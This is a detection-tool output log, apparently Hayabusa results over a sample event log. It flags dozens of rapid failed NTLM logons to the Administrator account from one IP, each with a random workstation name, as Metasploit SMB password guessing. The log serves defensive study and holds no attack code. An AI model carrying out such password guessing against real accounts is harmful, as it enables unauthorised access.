SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: 
